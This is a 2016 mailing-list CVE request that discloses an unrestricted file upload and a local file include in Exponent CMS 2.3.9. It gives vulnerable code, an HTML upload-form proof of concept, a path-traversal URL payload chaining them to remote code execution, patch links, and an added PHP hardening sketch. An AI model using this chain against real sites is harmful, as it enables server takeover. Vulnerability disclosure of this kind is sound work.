Message-ID: <tencent_4B081AB504A3C52B508F84E3@qq.com>
Date: Wed, 21 Sep 2016 10:08:21 +0800
From: "DM_" <contact@...ay.me>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request: Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File Include vulnerability

Hi,

This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago.

# Test environment

exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x

# Details

1. Unrestricted File Upload

There is an unrestricted file upload issue at framework/modules/forms/controllers/formsController.php, and the uploaded file is located at /tmp/, where PHP scripts can be executed. Although we don't know the file name, we can simply brute force it, as it is time() + "_" + upload name.

    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }

        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";
            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                // $file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/');
                //FIXME quick hack to remove file model
                ....

POC:

    <!DOCTYPE html>
    <html>
    <form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype="multipart/form-data">
    <input type="file" name="upload">
    <input type="submit" name="submit">
    </form>
    </html>

2. LFI

Then the LFI comes, at exponent-2.3.9/install/popup.php.

    <?php
    $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
    if (is_readable('popups/' . $page . '.php')) {
        include('popups/' . $page . '.php');
    }
    ?>

So we can upload a PHP file, then include it to achieve RCE again.

POC:

    http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test

# Patches

https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59
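The two code paths in the report share one root cause: user-controlled strings reach include() and the filesystem without being constrained to a known set of values. The following is an added hardening sketch, not Exponent CMS's own patch (the linked changesets are the real fix); the function names and the allowlist entries are constructed for illustration.

```php
<?php
// Added example (not from the advisory or the Exponent CMS code base).
// Two defensive checks for the issues described above: an allowlist for
// the include target in popup.php, and extension validation plus an
// unpredictable file name for the CSV import upload.

// Hypothetical replacement for the include logic in install/popup.php.
// Only names on a fixed list are ever passed to include(), so a "../"
// sequence in the request never reaches the filesystem at all.
function popupIncludePath(string $requested): ?string
{
    $allowed = ['license', 'help'];   // constructed allowlist; real page names differ
    if (!in_array($requested, $allowed, true)) {
        return null;                  // unknown page: do not include anything
    }
    return __DIR__ . '/popups/' . $requested . '.php';
}

// Hypothetical replacement for the upload step in import_csv_mapper().
// The importer only ever needs a CSV, so anything else is refused, and the
// stored name is random rather than time() . "_" . client-supplied name,
// which removes the guessable-path component the report relies on.
function safeCsvUploadTarget(array $file, string $directory): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Consider only the basename, and only a .csv suffix.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if ($ext !== 'csv') {
        return null;
    }
    // Random, server-chosen file name; the caller then uses move_uploaded_file()
    // with this target. The directory should also be outside the web root or
    // configured so the web server never executes scripts from it.
    return rtrim($directory, '/') . '/' . bin2hex(random_bytes(16)) . '.csv';
}

// Usage with constructed inputs mirroring the report's proof-of-concept values:
$include = popupIncludePath('../../files/test');      // traversal string is not on the allowlist
$target  = safeCsvUploadTarget(
    ['name' => 'test.php', 'error' => UPLOAD_ERR_OK],  // a .php upload is not a CSV
    'tmp'
);
```

Either check alone closes the chain in the report: without the include allowlist the uploaded file could still be reached, and without upload validation a traversal-free include of an attacker-named file remains possible, so a defender wants both.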